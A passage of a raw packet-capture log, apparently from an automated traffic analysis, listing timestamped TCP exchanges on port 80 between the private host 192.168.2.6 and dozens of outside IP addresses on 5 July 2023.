                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.923718929 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.923768044 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.923829079 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.923877001 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.923938990 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.923980951 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.924040079 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.924088955 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.924148083 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.924195051 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.924247980 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.924302101 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.924397945 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.924448967 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.924511909 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.924561977 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.924617052 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.924659014 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.924781084 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.924829006 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.935940027 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.935970068 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.936079979 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.936085939 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.936135054 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.936163902 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.936297894 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.936325073 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.936372042 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.936393023 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.936414003 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.936500072 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.936549902 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.936615944 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.936656952 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.936698914 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.936742067 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.936829090 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.936877012 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.936904907 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.936945915 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.937041044 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.937084913 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.937192917 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.937244892 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.937285900 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.937325954 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.937391043 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.937458992 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.937479973 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.937520981 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.937580109 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.937622070 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.937683105 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.937728882 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.937807083 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.937856913 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.937916040 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.937963009 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.938021898 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.938072920 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.938112974 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.938158989 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.938218117 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.938268900 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.938355923 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.938411951 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.938452959 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.938508987 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.938548088 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.938596964 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.938674927 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.938729048 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.938788891 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.938838005 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.938874006 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.938924074 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.938985109 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.939035892 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.939105988 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.939152956 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.939214945 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.939259052 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.939321041 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.939380884 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.939412117 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.939459085 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.939551115 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.939595938 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.939635992 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.939680099 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.939800024 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.939846992 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.939872980 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.939924002 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.939981937 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.940032005 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.940089941 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.940135002 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.940195084 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.940218925 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.940241098 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.940257072 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:20.075834036 CEST8049789217.19.237.54192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:20.076072931 CEST4978980192.168.2.6217.19.237.54
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:20.095906019 CEST4979480192.168.2.664.125.133.18
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:21.613651037 CEST8049792188.166.152.188192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:21.613794088 CEST4979280192.168.2.6188.166.152.188
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:22.410689116 CEST4979880192.168.2.65.196.166.214
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:22.447096109 CEST80497985.196.166.214192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:22.447284937 CEST4979880192.168.2.65.196.166.214
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:22.504633904 CEST4979880192.168.2.65.196.166.214
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:22.542296886 CEST80497985.196.166.214192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:22.542346954 CEST80497985.196.166.214192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:22.542458057 CEST4979880192.168.2.65.196.166.214
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:22.542459011 CEST4979880192.168.2.65.196.166.214
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:22.952949047 CEST4979980192.168.2.6103.224.212.221
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:23.022495031 CEST4980080192.168.2.6188.114.96.7
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:23.039236069 CEST8049800188.114.96.7192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:23.039434910 CEST4980080192.168.2.6188.114.96.7
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:23.056282997 CEST4980080192.168.2.6188.114.96.7
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:23.076374054 CEST8049800188.114.96.7192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:23.082856894 CEST8049800188.114.96.7192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:23.083015919 CEST4980080192.168.2.6188.114.96.7
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:23.120693922 CEST8049799103.224.212.221192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:23.121006012 CEST4979980192.168.2.6103.224.212.221
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:23.199743986 CEST4979980192.168.2.6103.224.212.221
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:23.244096994 CEST4980080192.168.2.6188.114.96.7
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:23.266678095 CEST8049800188.114.96.7192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:23.266833067 CEST4980080192.168.2.6188.114.96.7
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:23.410244942 CEST8049799103.224.212.221192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:23.446331024 CEST8049796208.109.214.162192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:23.446402073 CEST4979680192.168.2.6208.109.214.162
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:23.450778008 CEST8049799103.224.212.221192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:23.450803041 CEST8049799103.224.212.221192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:23.450875044 CEST4979980192.168.2.6103.224.212.221
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:23.450900078 CEST4979980192.168.2.6103.224.212.221
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:23.452702045 CEST4979980192.168.2.6103.224.212.221
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:23.620223999 CEST8049799103.224.212.221192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:24.259737968 CEST8049750208.97.178.138192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:25.584937096 CEST804973269.163.239.62192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:26.096484900 CEST4979480192.168.2.664.125.133.18
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.013645887 CEST804976969.163.218.51192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.025077105 CEST4980280192.168.2.670.39.251.249
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.059592009 CEST4980380192.168.2.659.106.19.204
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.062083960 CEST4980480192.168.2.6172.67.208.67
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.068447113 CEST4980580192.168.2.6192.124.249.20
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.076863050 CEST4980680192.168.2.680.93.82.33
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.078979969 CEST8049804172.67.208.67192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.079469919 CEST4980480192.168.2.6172.67.208.67
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.080121040 CEST4980480192.168.2.6172.67.208.67
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.080573082 CEST4980780192.168.2.6137.118.26.67
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.090393066 CEST8049805192.124.249.20192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.090517044 CEST4980580192.168.2.6192.124.249.20
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.090982914 CEST4980580192.168.2.6192.124.249.20
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.098376989 CEST8049804172.67.208.67192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.106930971 CEST804980680.93.82.33192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.107177019 CEST4980680192.168.2.680.93.82.33
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.107654095 CEST4980680192.168.2.680.93.82.33
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.109915018 CEST8049804172.67.208.67192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.110030890 CEST4980480192.168.2.6172.67.208.67
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.112746000 CEST8049805192.124.249.20192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.112989902 CEST8049805192.124.249.20192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.113084078 CEST4980580192.168.2.6192.124.249.20
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.135808945 CEST804980270.39.251.249192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.135946989 CEST4980280192.168.2.670.39.251.249
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.137768984 CEST804980680.93.82.33192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.137888908 CEST4980680192.168.2.680.93.82.33
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.225018024 CEST4980280192.168.2.670.39.251.249
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.225511074 CEST4980580192.168.2.6192.124.249.20
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.227210999 CEST4980880192.168.2.63.140.13.188
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.247729063 CEST8049805192.124.249.20192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.247878075 CEST4980580192.168.2.6192.124.249.20
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.250403881 CEST4980680192.168.2.680.93.82.33
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.280899048 CEST804980680.93.82.33192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.281066895 CEST4980680192.168.2.680.93.82.33
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.324954033 CEST804980359.106.19.204192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.325300932 CEST4980380192.168.2.659.106.19.204
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.330533981 CEST804980270.39.251.249192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.331259012 CEST804980270.39.251.249192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.331388950 CEST4980280192.168.2.670.39.251.249
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.383666039 CEST80498083.140.13.188192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.383784056 CEST4980880192.168.2.63.140.13.188
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.387821913 CEST4980380192.168.2.659.106.19.204
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.413184881 CEST4980880192.168.2.63.140.13.188
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.441590071 CEST4980280192.168.2.670.39.251.249
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.472455978 CEST4980980192.168.2.6188.114.96.7
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.489298105 CEST8049809188.114.96.7192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.489469051 CEST4980980192.168.2.6188.114.96.7
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.489943981 CEST4980980192.168.2.6188.114.96.7
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.506253004 CEST8049809188.114.96.7192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.507843018 CEST4981080192.168.2.6104.26.7.221
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.512917042 CEST4981180192.168.2.6185.15.129.58
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.516196966 CEST4981280192.168.2.634.149.87.45
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.524451971 CEST8049810104.26.7.221192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.524620056 CEST4981080192.168.2.6104.26.7.221
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.525044918 CEST4981080192.168.2.6104.26.7.221
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.531160116 CEST804981234.149.87.45192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.531380892 CEST4981280192.168.2.634.149.87.45
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.531728029 CEST4981280192.168.2.634.149.87.45
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.538217068 CEST8049809188.114.96.7192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.538321018 CEST4980980192.168.2.6188.114.96.7
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.542089939 CEST8049810104.26.7.221192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.546514034 CEST804981234.149.87.45192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.547751904 CEST804980270.39.251.249192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.547908068 CEST4980280192.168.2.670.39.251.249
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.548892021 CEST8049810104.26.7.221192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.549031019 CEST4981080192.168.2.6104.26.7.221
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.569283009 CEST80498083.140.13.188192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.569324017 CEST80498083.140.13.188192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.569400072 CEST4980880192.168.2.63.140.13.188
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.569436073 CEST4980880192.168.2.63.140.13.188
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.569749117 CEST8049770147.154.3.56192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.569840908 CEST4977080192.168.2.6147.154.3.56
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.590645075 CEST804980359.106.19.204192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.621813059 CEST4980880192.168.2.63.140.13.188
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.633330107 CEST804981234.149.87.45192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.633537054 CEST4981280192.168.2.634.149.87.45
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.654295921 CEST804980359.106.19.204192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.654367924 CEST804980359.106.19.204192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.654413939 CEST804980359.106.19.204192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.654457092 CEST804980359.106.19.204192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.654500008 CEST804980359.106.19.204192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.654541016 CEST804980359.106.19.204192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.654539108 CEST4980380192.168.2.659.106.19.204
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.654583931 CEST4980380192.168.2.659.106.19.204
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.654587030 CEST804980359.106.19.204192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.654623985 CEST4980380192.168.2.659.106.19.204
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.654630899 CEST804980359.106.19.204192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.654647112 CEST4980380192.168.2.659.106.19.204
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.654690027 CEST804980359.106.19.204192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.654690981 CEST4980380192.168.2.659.106.19.204
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.654738903 CEST4980380192.168.2.659.106.19.204
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.654743910 CEST804980359.106.19.204192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.654798985 CEST4980380192.168.2.659.106.19.204
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.715219021 CEST4981080192.168.2.6104.26.7.221
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.724617004 CEST4981380192.168.2.6118.27.125.181
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.735537052 CEST8049810104.26.7.221192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.735712051 CEST4981080192.168.2.6104.26.7.221
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.737839937 CEST4981480192.168.2.63.140.13.188
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.777889013 CEST80498083.140.13.188192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.894604921 CEST80498143.140.13.188192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.894774914 CEST4981480192.168.2.63.140.13.188
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.896728039 CEST4981480192.168.2.63.140.13.188
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.910763979 CEST4981580192.168.2.6172.217.16.179
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.913068056 CEST4981680192.168.2.6172.67.70.22
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.919624090 CEST4981780192.168.2.662.122.190.121
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.919950008 CEST804980359.106.19.204192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.919979095 CEST804980359.106.19.204192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.920058012 CEST4980380192.168.2.659.106.19.204
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.925381899 CEST8049815172.217.16.179192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.925496101 CEST4981580192.168.2.6172.217.16.179
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.929929018 CEST8049816172.67.70.22192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.930036068 CEST4981680192.168.2.6172.67.70.22
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.956526995 CEST804981762.122.190.121192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.956696987 CEST4981780192.168.2.662.122.190.121
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.990151882 CEST4981580192.168.2.6172.217.16.179
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.990201950 CEST4981680192.168.2.6172.67.70.22
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.990566969 CEST4981780192.168.2.662.122.190.121
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.995253086 CEST8049813118.27.125.181192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.995502949 CEST4981380192.168.2.6118.27.125.181
